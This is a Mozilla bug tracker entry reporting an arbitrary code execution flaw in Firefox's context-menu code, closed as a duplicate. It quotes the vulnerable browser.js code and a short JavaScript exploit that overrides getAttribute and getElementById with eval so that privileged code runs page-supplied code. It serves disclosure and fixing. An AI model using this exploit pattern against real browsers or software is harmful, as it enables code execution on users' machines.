Closed Bug 289078 Opened 20 years ago Closed 20 years ago

security hole in nsContextMenu.setTarget()

Categories

(Core :: Security, defect)

Product:
Core
Component:
Security
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 289074

People

(Reporter: moz_bug_r_a4, Assigned: dveditz)

References

Details

(Whiteboard: [sg:dupe 289074])

Attachments

(1 file)

testcase
536 bytes, text/html
Details 
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319

Vulnerability: arbitrary code execution

Vulnerable code:
from nsContextMenu.prototype.setTarget() in browser.js

if ( this.target.nodeType == Node.ELEMENT_NODE ) {
     if ( this.target.localName.toUpperCase() == "IMG" ) {
        this.onImage = true;
        this.imageURL = this.target.src;
        // Look for image map.
        var mapName = this.target.getAttribute( "usemap" );
        if ( mapName ) {
            // Find map.
            var map = this.target.ownerDocument.getElementById( mapName.substr(1) );


Exploit:
Web pages can overwrite the getAttribute and getElementById methods, such as
the following.

  document.images[0].getAttribute = function() {
    return { substr : function() { return MALICIOUS_CODE; } };
  };
  document.getElementById = eval;


I have confirmed that the following testcase works in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404


Reproducible: Always

Steps to Reproduce:
Attached file testcase 

    
  
Status: UNCONFIRMED → NEW
Ever confirmed: true

    
  
Blocks: sbb?

    
  
Flags: blocking1.7.7?
Flags: blocking-aviary1.0.3?

    
  
Blocks: 289187

    
    

    
  
Note that the testcase doesn't seem to exploit on trunk gecko.

    
    

    
  
Same eval problem as reported in bug 289074.

*** This bug has been marked as a duplicate of 289074 ***

*** This bug has been marked as a duplicate of 289074 ***
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE

    
  
Whiteboard: [sg:dupe 289074]

    
  
Flags: blocking1.7.7?
Flags: blocking-aviary1.0.3?

    
  
Group: security

    
  
Blocks: sbb+

    
  
No longer blocks: sbb?

          You need to log in
          before you can comment on or make changes to this bug.
        






  

    
  







  

    

      
Attachment

      

      
      
      
      
    

    

      

        

          

            
General

            

              Creator: 



            

            
Created: 

            
Updated: 

            
Size: